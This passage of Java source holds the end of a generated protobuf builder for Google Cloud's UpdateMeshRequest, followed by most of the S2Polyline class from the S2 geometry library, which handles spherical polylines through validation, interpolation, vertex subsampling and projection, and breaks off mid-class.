* The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * * * <pre> * Optional. Field mask is used to specify the fields to be overwritten in the * Mesh resource by the update. * The fields specified in the update_mask are relative to the resource, not * the full request. A field will be overwritten if it is in the mask. If the * user does not provide a mask then all fields will be overwritten. 
* </pre> * * <code>.google.protobuf.FieldMask update_mask = 1 [(.google.api.field_behavior) = OPTIONAL]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.cloud.networkservices.v1.Mesh mesh_; private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.networkservices.v1.Mesh, com.google.cloud.networkservices.v1.Mesh.Builder, com.google.cloud.networkservices.v1.MeshOrBuilder> meshBuilder_; /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return Whether the mesh field is set. */ public boolean hasMesh() { return ((bitField0_ & 0x00000002) != 0); } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> * * @return The mesh. */ public com.google.cloud.networkservices.v1.Mesh getMesh() { if (meshBuilder_ == null) { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } else { return meshBuilder_.getMessage(); } } /** * * * <pre> * Required. Updated Mesh resource. 
* </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setMesh(com.google.cloud.networkservices.v1.Mesh value) { if (meshBuilder_ == null) { if (value == null) { throw new NullPointerException(); } mesh_ = value; } else { meshBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder setMesh(com.google.cloud.networkservices.v1.Mesh.Builder builderForValue) { if (meshBuilder_ == null) { mesh_ = builderForValue.build(); } else { meshBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder mergeMesh(com.google.cloud.networkservices.v1.Mesh value) { if (meshBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && mesh_ != null && mesh_ != com.google.cloud.networkservices.v1.Mesh.getDefaultInstance()) { getMeshBuilder().mergeFrom(value); } else { mesh_ = value; } } else { meshBuilder_.mergeFrom(value); } if (mesh_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public Builder clearMesh() { bitField0_ = (bitField0_ & ~0x00000002); mesh_ = null; if (meshBuilder_ != null) { meshBuilder_.dispose(); meshBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Required. Updated Mesh resource. 
* </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.networkservices.v1.Mesh.Builder getMeshBuilder() { bitField0_ |= 0x00000002; onChanged(); return getMeshFieldBuilder().getBuilder(); } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ public com.google.cloud.networkservices.v1.MeshOrBuilder getMeshOrBuilder() { if (meshBuilder_ != null) { return meshBuilder_.getMessageOrBuilder(); } else { return mesh_ == null ? com.google.cloud.networkservices.v1.Mesh.getDefaultInstance() : mesh_; } } /** * * * <pre> * Required. Updated Mesh resource. * </pre> * * <code> * .google.cloud.networkservices.v1.Mesh mesh = 2 [(.google.api.field_behavior) = REQUIRED]; * </code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.networkservices.v1.Mesh, com.google.cloud.networkservices.v1.Mesh.Builder, com.google.cloud.networkservices.v1.MeshOrBuilder> getMeshFieldBuilder() { if (meshBuilder_ == null) { meshBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.cloud.networkservices.v1.Mesh, com.google.cloud.networkservices.v1.Mesh.Builder, com.google.cloud.networkservices.v1.MeshOrBuilder>( getMesh(), getParentForChildren(), isClean()); mesh_ = null; } return meshBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.networkservices.v1.UpdateMeshRequest) } // @@protoc_insertion_point(class_scope:google.cloud.networkservices.v1.UpdateMeshRequest) private static final 
com.google.cloud.networkservices.v1.UpdateMeshRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.networkservices.v1.UpdateMeshRequest(); } public static com.google.cloud.networkservices.v1.UpdateMeshRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<UpdateMeshRequest> PARSER = new com.google.protobuf.AbstractParser<UpdateMeshRequest>() { @java.lang.Override public UpdateMeshRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<UpdateMeshRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<UpdateMeshRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.networkservices.v1.UpdateMeshRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
google/s2-geometry-library-java
35,903
library/src/com/google/common/geometry/S2Polyline.java
/* * Copyright 2006 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.geometry; import static java.lang.Math.PI; import static java.lang.Math.asin; import static java.lang.Math.atan2; import static java.lang.Math.max; import static java.lang.Math.min; import static java.lang.Math.sin; import com.google.common.base.Preconditions; import com.google.common.collect.Lists; import com.google.common.geometry.PrimitiveArrays.Bytes; import com.google.common.geometry.PrimitiveArrays.Cursor; import com.google.common.geometry.S2EdgeUtil.EdgeCrosser; import com.google.common.geometry.S2Projections.FaceSiTi; import com.google.common.geometry.S2ShapeUtil.S2EdgeVectorShape; import com.google.errorprone.annotations.InlineMe; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.io.Serializable; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.List; import java.util.Objects; import java.util.function.Predicate; import java.util.logging.Logger; import jsinterop.annotations.JsConstructor; import jsinterop.annotations.JsIgnore; import jsinterop.annotations.JsType; /** * An S2Polyline represents a sequence of zero or more vertices connected by straight edges * (geodesics). Edges of length 0 and 180 degrees are not allowed, i.e. adjacent vertices should not * be identical or antipodal. An S2Polyline with a single vertex generally represents a degenerate * edge. 
In particular, an S2Polyline can be viewed as an S2Shape via {@link #shape()}, and a single * vertex S2Polyline will be presented as an S2Shape with one degenerate edge. * * S2Polylines are immutable. * * <p>Note: Polylines do not have a contains(S2Point) method, because "containment" is not * numerically well-defined except at the polyline vertices. * * @author shakusa@google.com (Steven Hakusa) ported from util/geometry * @author ericv@google.com (Eric Veach) original author */ @JsType public final class S2Polyline implements S2Shape, S2Region, Serializable { private static final Logger log = Platform.getLoggerForClass(S2Polyline.class); private static final S2Point[] ARR_TEMPLATE = {}; private static final byte LOSSLESS_ENCODING_VERSION = 1; private static final byte COMPRESSED_ENCODING_VERSION = 2; /** A fast {@link S2Coder} of polylines that uses {@link #encode} and {@link #decode}. */ public static final S2Coder<S2Polyline> FAST_CODER = new S2Coder<S2Polyline>() { @Override public void encode(S2Polyline value, OutputStream output) throws IOException { value.encodeUncompressed(new LittleEndianOutput(output)); } @Override public S2Polyline decode(Bytes data, Cursor cursor) throws IOException { return S2Polyline.decode(data.toInputStream(cursor)); } @Override public boolean isLazy() { return false; } }; /** A fast {@link S2Coder} of polylines that uses {@link #encode} and {@link #decode}. */ public static final S2Coder<S2Polyline> COMPACT_CODER = new S2Coder<S2Polyline>() { @Override public void encode(S2Polyline value, OutputStream output) throws IOException { value.encodeCompact(output); } @Override public S2Polyline decode(Bytes data, Cursor cursor) throws IOException { return S2Polyline.decode(data.toInputStream(cursor)); } @Override public boolean isLazy() { return false; } }; private final int numVertices; private final S2Point[] vertices; /** * Create a polyline that connects the given vertices, which are copied. Empty polylines are * allowed. 
Single-vertex polylines are allowed but are not valid in all contexts; they generally
   * are considered to represent a degenerate edge. Adjacent vertices must not be identical or
   * antipodal. All vertices must be unit length.
   */
  @JsIgnore
  public S2Polyline(List<S2Point> vertices) {
    this(vertices.toArray(ARR_TEMPLATE));
  }

  /** Copy constructor. */
  @JsIgnore
  public S2Polyline(S2Polyline other) {
    this(other.vertices().toArray(ARR_TEMPLATE));
  }

  /**
   * As {@link S2Polyline(List)}, creates a polyline that connects the given vertices, but takes
   * ownership of the provided array of points which may not be further modified by the caller. All
   * vertices must be unit length.
   */
  @JsConstructor
  S2Polyline(S2Point[] vertices) {
    // assert isValid(vertices);
    this.numVertices = vertices.length;
    this.vertices = vertices;
  }

  /** Returns an unmodifiable view of the vertices of this polyline. */
  public List<S2Point> vertices() {
    return Collections.unmodifiableList(Arrays.asList(vertices));
  }

  /**
   * Checks that the polyline is valid. If any problem is found, fills in the provided error and
   * returns true. Otherwise returns false.
   */
  public boolean findValidationError(S2Error error) {
    // All vertices must be unit length.
    int n = vertices.length;
    for (int i = 0; i < n; ++i) {
      if (!S2.isUnitLength(vertices[i])) {
        error.init(S2Error.Code.NOT_UNIT_LENGTH, "Vertex " + i + " is not unit length");
        return true;
      }
    }
    // Adjacent vertices must not be identical or antipodal.
    for (int i = 1; i < n; ++i) {
      if (vertices[i - 1].equalsPoint(vertices[i])) {
        error.init(
            S2Error.Code.DUPLICATE_VERTICES,
            "Vertices " + (i - 1) + " and " + i + " are identical");
        return true;
      }
      if (vertices[i - 1].equalsPoint(S2Point.neg(vertices[i]))) {
        error.init(
            S2Error.Code.ANTIPODAL_VERTICES,
            "Vertices " + (i - 1) + " and " + i + " are antipodal");
        return true;
      }
    }
    return false;
  }

  /**
   * Return true if the polyline is valid, having all vertices unit length and having no identical
   * or antipodal adjacent vertices.
   */
  public boolean isValid() {
    return isValid(vertices());
  }

  /** Return true if the given vertices form a valid polyline. */
  @JsIgnore
  public static boolean isValid(List<S2Point> vertices) {
    // All vertices must be unit length.
    int n = vertices.size();
    for (int i = 0; i < n; ++i) {
      if (!S2.isUnitLength(vertices.get(i))) {
        log.info("Vertex " + i + " is not unit length");
        return false;
      }
    }
    // Adjacent vertices must not be identical or antipodal.
    for (int i = 1; i < n; ++i) {
      if (vertices.get(i - 1).equalsPoint(vertices.get(i))
          || vertices.get(i - 1).equalsPoint(S2Point.neg(vertices.get(i)))) {
        log.info("Vertices " + (i - 1) + " and " + i + " are identical or antipodal");
        return false;
      }
    }
    return true;
  }

  /** Returns the number of vertices in this polyline. */
  public int numVertices() {
    return numVertices;
  }

  /** Returns vertex k; k must be in the range [0, numVertices()). */
  public S2Point vertex(int k) {
    // assert (k >= 0 && k < numVertices);
    return vertices[k];
  }

  /** Return the angle corresponding to the total arclength of the polyline on a unit sphere. */
  public S1Angle getArclengthAngle() {
    double lengthSum = 0;
    for (int i = 1; i < numVertices(); ++i) {
      lengthSum += vertex(i - 1).angle(vertex(i));
    }
    return S1Angle.radians(lengthSum);
  }

  /**
   * Return the true centroid of the polyline multiplied by the length of the polyline. (See the
   * "About centroids" comments of S2.java for details on centroids). The result is not unit length,
   * so you may want to normalize it.
   *
   * <p>Prescaling by the polyline length makes it easy to compute the centroid of several polylines
   * by simply adding up their centroids.
   */
  public S2Point getCentroid() {
    return S2ShapeMeasures.polylineCentroid(this, /* chainId= */ 0);
  }

  /**
   * Return the point whose distance from vertex 0 along the polyline is the given fraction of the
   * polyline's total length. Fractions less than zero or greater than one are clamped. The return
   * value is unit length if this polyline is valid. The cost of this function is currently linear
   * in the number of vertices.
   *
   * @throws IllegalStateException if this polyline has no vertices.
   */
  public S2Point interpolate(double fraction) {
    Preconditions.checkState(numVertices() > 0, "Empty polyline");

    // We intentionally let the (fraction >= 1) case fall through, since we need to handle it in the
    // loop below in any case because of possible roundoff errors.
    if (fraction <= 0) {
      return vertex(0);
    }

    // First pass: total arclength of the polyline.
    double lengthSum = 0; // radians
    for (int i = 1; i < numVertices(); ++i) {
      lengthSum += vertex(i - 1).angle(vertex(i));
    }

    // Second pass: walk edges until the remaining target distance fits inside one edge.
    double target = fraction * lengthSum; // radians
    for (int i = 1; i < numVertices(); ++i) {
      double length = vertex(i - 1).angle(vertex(i));
      if (target < length) {
        // This interpolates with respect to arc length rather than straight-line distance, and
        // produces a unit-length result.
        return S2EdgeUtil.getPointOnLine(vertex(i - 1), vertex(i), S1Angle.radians(target));
      }
      target -= length;
    }
    return vertex(numVertices() - 1);
  }

  /**
   * Projects the query point to the nearest part of the polyline, and returns the fraction of the
   * polyline's total length traveled along the polyline from vertex 0 to the projected point.
   *
   * <p>For any query point, the returned fraction is at least 0 (when the query point projects to
   * the first vertex of the line) and at most 1 (when the query point projects to the last vertex).
   *
   * <p>This method is essentially the inverse of {@link #interpolate(double)}, except that this
   * method accepts any normalized point, whereas interpolate() only produces points on the line.
   *
   * <p>In the unusual case of multiple equidistant points on the polyline, one of the nearest
   * points is selected in a deterministic but unpredictable manner, and the fraction is computed up
   * to that position. For example, all points of the S2 edge from (1,0,0) to (0,1,0) are
   * equidistant from (0,0,1), so any fraction from 0 to 1 is a correct answer!
   *
   * <p>The polyline should not be empty. If it has fewer than 2 vertices the return value is zero.
*/ public double uninterpolate(S2Point queryPoint) { if (numVertices() == 1) { return 0; } int i = getNearestEdgeIndex(queryPoint); double arcLength = S2EdgeUtil.project(queryPoint, vertex(i), vertex(i + 1)).angle(vertex(i)); for (; i > 0; i--) { arcLength += vertex(i - 1).angle(vertex(i)); } return min(arcLength / getArclengthAngle().radians(), 1); } // S2Region interface (see S2Region.java for details): /** Return a bounding spherical cap. */ @Override public S2Cap getCapBound() { return getRectBound().getCapBound(); } /** Return a bounding latitude-longitude rectangle. */ @Override public S2LatLngRect getRectBound() { S2EdgeUtil.RectBounder bounder = new S2EdgeUtil.RectBounder(); for (int i = 0; i < numVertices(); ++i) { bounder.addPoint(vertex(i)); } return bounder.getBound(); } /** * If this method returns true, the region completely contains the given cell. Otherwise, either * the region does not contain the cell or the containment relationship could not be determined. */ @Override public boolean contains(S2Cell cell) { return false; } @Override public boolean contains(S2Point point) { return false; } /** * If this method returns false, the region does not intersect the given cell. Otherwise, either * region intersects the cell, or the intersection relationship could not be determined. */ @Override public boolean mayIntersect(S2Cell cell) { if (numVertices() == 0) { return false; } // We only need to check whether the cell contains vertex 0 for correctness, but these tests // are cheap compared to edge crossings so we might as well check all the vertices. 
for (int i = 0; i < numVertices(); ++i) { if (cell.contains(vertex(i))) { return true; } } S2Point[] cellVertices = new S2Point[4]; for (int i = 0; i < 4; ++i) { cellVertices[i] = cell.getVertex(i); } for (int j = 0; j < 4; ++j) { S2EdgeUtil.EdgeCrosser crosser = new S2EdgeUtil.EdgeCrosser(cellVertices[j], cellVertices[(j + 1) & 3], vertex(0)); for (int i = 1; i < numVertices(); ++i) { if (crosser.robustCrossing(vertex(i)) >= 0) { // There is a proper crossing, or two vertices were the same. return true; } } } return false; } /** * Removes any point from the given List of points that is exactly equal to to its next neighbor. * Valid S2Polylines may not have duplicate adjacent points, so this may be useful to make a list * of points into a valid polyline. The resulting list of points may have only one point. */ public static void deduplicatePoints(List<S2Point> linePoints) { if (linePoints.size() < 2) { return; } linePoints.removeIf( new Predicate<S2Point>() { S2Point last = null; @Override public boolean test(S2Point p) { boolean remove = last != null && p.equalsPoint(last); last = p; return remove; } }); } /** * Returns a new polyline where the vertices of the given polyline have been snapped to the * centers of cells at the specified level. */ public static S2Polyline fromSnapped(final S2Polyline a, int snapLevel) { // TODO(user): Use S2Builder when available. List<S2Point> snappedVertices = new ArrayList<>(a.numVertices()); S2Point prev = snapPointToLevel(a.vertex(0), snapLevel); snappedVertices.add(prev); for (int i = 1; i < a.numVertices(); i++) { S2Point curr = snapPointToLevel(a.vertex(i), snapLevel); if (!curr.equalsPoint(prev)) { prev = curr; snappedVertices.add(curr); } } return new S2Polyline(snappedVertices); } /** * Returns a new point, snapped to the center of the cell containing the given point at the * specified level. 
   */
  private static S2Point snapPointToLevel(final S2Point p, int level) {
    return S2CellId.fromPoint(p).parent(level).toPoint();
  }

  /**
   * Return a subsequence of vertex indices such that the polyline connecting these vertices is
   * never further than "tolerance" from the original polyline. Provided the first and last vertices
   * are distinct, they are always preserved; if they are not, the subsequence may contain only a
   * single index.
   *
   * <p>Some useful properties of the algorithm:
   *
   * <ul>
   *   <li>It runs in linear time.
   *   <li>The output is always a valid polyline. In particular, adjacent output vertices are never
   *       identical or antipodal.
   *   <li>The method is not optimal, but it tends to produce 2-3% fewer vertices than the
   *       Douglas-Peucker algorithm with the same tolerance.
   *   <li>The output is *parametrically* equivalent to the original polyline to within the given
   *       tolerance. For example, if a polyline backtracks on itself and then proceeds onwards, the
   *       backtracking will be preserved (to within the given tolerance). This is different than
   *       the Douglas-Peucker algorithm, which only guarantees geometric equivalence.
   * </ul>
   */
  public S2Polyline subsampleVertices(S1Angle tolerance) {
    if (vertices.length == 0) {
      return this;
    }

    List<S2Point> results = Lists.newArrayList();
    results.add(vertex(0));
    // Negative tolerances behave like a tolerance of zero.
    S1Angle clampedTolerance = S1Angle.max(tolerance, S1Angle.ZERO);
    for (int i = 0; i < vertices.length - 1; ) {
      int nextIndex = findEndVertex(clampedTolerance, i);
      // Don't create duplicate adjacent vertices.
      if (!vertex(nextIndex).equalsPoint(vertex(i))) {
        results.add(vertex(nextIndex));
      }
      i = nextIndex;
    }
    return new S2Polyline(results);
  }

  /**
   * Given a polyline, a tolerance distance, and a start index, this function returns the maximal
   * end index such that the line segment between these two vertices passes within "tolerance" of
   * all interior vertices, in order.
   */
  private int findEndVertex(S1Angle tolerance, int index) {
    // assert tolerance.radians() >= 0;
    // assert index + 1 < polyline.num_vertices();

    // The basic idea is to keep track of the "pie wedge" of angles from the starting vertex such
    // that a ray from the starting vertex at that angle will pass through the discs of radius
    // "tolerance" centered around all vertices processed so far.

    // First we define a "coordinate frame" for the tangent and normal spaces at the starting
    // vertex. Essentially this means picking three orthonormal vectors X,Y,Z such that X and Y
    // span the tangent plane at the starting vertex, and Z is "up". We use the coordinate frame to
    // define a mapping from 3D direction vectors to a one-dimensional "ray angle" in the range
    // (-Pi, Pi]. The angle of a direction vector is computed by transforming it into the X,Y,Z
    // basis, and then calculating atan2(y,x). This mapping allows us to represent a wedge of
    // angles as a 1D interval. Since the interval wraps around, we represent it as an S1Interval,
    // i.e. an interval on the unit circle.
    S2Point origin = vertex(index);
    Matrix frame = S2.getFrame(origin);

    // As we go along, we keep track of the current wedge of angles and the distance to the last
    // vertex (which must be non-decreasing).
    S1Interval currentWedge = S1Interval.full();
    double lastDistance = 0;

    for (++index; index < vertices.length; ++index) {
      S2Point candidate = vertex(index);
      double distance = origin.angle(candidate);

      // We don't allow simplification to create edges longer than 90 degrees, to avoid numeric
      // instability as lengths approach 180 degrees. (We do need to allow for original edges
      // longer than 90 degrees, though.)
      if (distance > PI / 2 && lastDistance > 0) {
        break;
      }

      // Vertices must be in increasing order along the ray, except for the initial disc around the
      // origin.
      if (distance < lastDistance && lastDistance > tolerance.radians()) {
        break;
      }

      lastDistance = distance;

      // Points that are within the tolerance distance of the origin do not constrain the ray
      // direction, so we can ignore them.
      if (distance <= tolerance.radians()) {
        continue;
      }

      // If the current wedge of angles does not contain the angle to this vertex, then stop right
      // now. Note that the wedge of possible ray angles is not necessarily empty yet, but we can't
      // continue unless we are willing to backtrack to the last vertex that was contained within
      // the wedge (since we don't create new vertices). This would be more complicated and also
      // make the worst-case running time more than linear.
      S2Point direction = S2.toFrame(frame, candidate);
      double center = atan2(direction.y, direction.x);
      if (!currentWedge.contains(center)) {
        break;
      }

      // To determine how this vertex constrains the possible ray angles, consider the triangle ABC
      // where A is the origin, B is the candidate vertex, and C is one of the two tangent points
      // between A and the spherical cap of radius "tolerance" centered at B. Then from the
      // spherical law of sines, sin(a)/sin(A) = sin(c)/sin(C), where "a" and "c" are the lengths of
      // the edges opposite A and C. In our case C is a 90 degree angle, therefore
      // A = asin(sin(a) / sin(c)). Angle A is the half-angle of the allowable wedge.
      double halfAngle = asin(sin(tolerance.radians()) / sin(distance));
      S1Interval target = S1Interval.fromPoint(center).expanded(halfAngle);
      currentWedge = currentWedge.intersection(target);
      // assert !currentWedge.isEmpty();
    }

    // We break out of the loop when we reach a vertex index that can't be included in the line
    // segment, so back up by one vertex.
    return index - 1;
  }

  /**
   * Given a point, which must be normalized, returns the index of the start point of the (first)
   * edge on this polyline that is closest to the given point. This polyline must have at least one
   * vertex.
   *
   * @throws IllegalStateException if this polyline does not have any vertices
   * @throws IllegalArgumentException if 'point' is not unit length
   */
  public int getNearestEdgeIndex(S2Point point) {
    Preconditions.checkState(numVertices() > 0, "Empty polyline");

    if (numVertices() == 1) {
      // If there is only one vertex, the "edge" is trivial, and it's the only one
      return 0;
    }

    // Initial value larger than any possible distance on the unit sphere.
    S1Angle minDistance = S1Angle.radians(10);
    int minIndex = -1;

    // Find the line segment in the polyline that is closest to the point given.
    for (int i = 0; i < numVertices() - 1; ++i) {
      S1Angle distanceToSegment = S2EdgeUtil.getDistance(point, vertex(i), vertex(i + 1));
      if (distanceToSegment.lessThan(minDistance)) {
        minDistance = distanceToSegment;
        minIndex = i;
      }
    }
    return minIndex;
  }

  /**
   * Given a point p and the index of the start point of an edge of this polyline, returns the point
   * on that edge that is closest to p. The point must be unit length.
   *
   * @throws IllegalStateException if this polyline does not have any vertices
   * @throws IllegalArgumentException if the given index is out of range for this polyline
   */
  public S2Point projectToEdge(S2Point point, int index) {
    Preconditions.checkState(numVertices() > 0, "Empty polyline");
    Preconditions.checkArgument(
        numVertices() == 1 || index < numVertices() - 1, "Invalid edge index");
    if (numVertices() == 1) {
      // If there is only one vertex, it is always closest to any given point.
      return vertex(0);
    }
    return S2EdgeUtil.project(point, vertex(index), vertex(index + 1));
  }

  /**
   * Returns the point on this polyline closest to {@code queryPoint}, which must be normalized.
   * This polyline must have at least one point.
   *
   * <p>In the unusual case of a query point that is equidistant from multiple points on the line,
   * one is returned in a deterministic but otherwise unpredictable way.
   *
   * @throws IllegalStateException if this polyline does not have any vertices
   * @throws IllegalArgumentException if 'queryPoint' is not unit length
   */
  public S2Point project(S2Point queryPoint) {
    Preconditions.checkState(numVertices() > 0, "Empty polyline");

    if (numVertices() == 1) {
      // If there is only one vertex, it is always closest to any given point.
      return vertex(0);
    }

    int i = getNearestEdgeIndex(queryPoint);
    return S2EdgeUtil.project(queryPoint, vertex(i), vertex(i + 1));
  }

  /** Two polylines are equal when they have the same vertex count and pairwise-equal vertices. */
  @Override
  public boolean equals(Object that) {
    if (!(that instanceof S2Polyline)) {
      return false;
    }

    S2Polyline thatPolyline = (S2Polyline) that;
    if (numVertices != thatPolyline.numVertices) {
      return false;
    }

    for (int i = 0; i < vertices.length; i++) {
      if (!vertices[i].equalsPoint(thatPolyline.vertices[i])) {
        return false;
      }
    }
    return true;
  }

  /**
   * Return true if this polyline intersects the given polyline. If the polylines share a vertex
   * they are considered to be intersecting. When a polyline endpoint is the only intersection with
   * the other polyline, the function may return true or false arbitrarily.
   *
   * <p>The running time is quadratic in the number of vertices.
   */
  public boolean intersects(S2Polyline line) {
    if (numVertices() <= 0 || line.numVertices() <= 0) {
      return false;
    }

    // Cheap rejection test: polylines with disjoint bounds cannot intersect.
    if (!getRectBound().intersects(line.getRectBound())) {
      return false;
    }

    // TODO(user): Use S2ShapeIndex here.
    for (int i = 1; i < numVertices(); ++i) {
      EdgeCrosser crosser = new EdgeCrosser(vertex(i - 1), vertex(i), line.vertex(0));
      for (int j = 1; j < line.numVertices(); ++j) {
        if (crosser.robustCrossing(line.vertex(j)) >= 0) {
          return true;
        }
      }
    }
    return false;
  }

  @Override
  public int hashCode() {
    return Objects.hash(numVertices, Arrays.deepHashCode(vertices));
  }

  @Override
  public String toString() {
    StringBuilder builder = new StringBuilder("S2Polyline, ");
    builder.append(vertices.length).append(" points. [");
    for (S2Point v : vertices) {
      builder.append(v.toDegreesString()).append(" ");
    }
    builder.append("]");
    return builder.toString();
  }

  // S2Shape interface (see S2Shape.java for details):

  // Lazily-created S2Shape view; transient so it is rebuilt on demand after deserialization.
  private transient S2Shape shape;

  /**
   * Returns an S2Shape view of this polyline.
   *
   * <p>Note that while a valid S2Polyline may have a single vertex, the S2Shape API only supports
   * edges organized into chains. Therefore, shape() presents single-vertex S2Polylines as a one
   * dimensional S2Shape with a single degenerate edge, in a one-edge chain.
   */
  public S2Shape shape() {
    if (shape == null) {
      if (numVertices == 1) {
        S2EdgeVectorShape evs = new S2EdgeVectorShape();
        evs.addDegenerate(vertices[0]);
        shape = evs;
      } else {
        // Zero vertices or >=2 vertices.
        shape =
            new S2Shape() {
              @Override
              public int numEdges() {
                return max(0, numVertices - 1);
              }

              @Override
              public void getEdge(int index, MutableEdge result) {
                result.set(vertices[index], vertices[index + 1]);
              }

              @Override
              public boolean hasInterior() {
                return false;
              }

              @Override
              public boolean containsOrigin() {
                throw new IllegalStateException(
                    "An S2Polyline has no interior, so containsOrigin()"
                        + " should never be called on one.");
              }

              @Override
              public int numChains() {
                return (numVertices > 1) ? 1 : 0;
              }

              @Override
              public int getChainStart(int chainId) {
                Preconditions.checkElementIndex(chainId, numChains());
                return 0;
              }

              @Override
              public int getChainLength(int chainId) {
                Preconditions.checkElementIndex(chainId, numChains());
                return numEdges();
              }

              @Override
              public void getChainEdge(int chainId, int offset, MutableEdge result) {
                Preconditions.checkElementIndex(chainId, numChains());
                getEdge(offset, result);
              }

              @Override
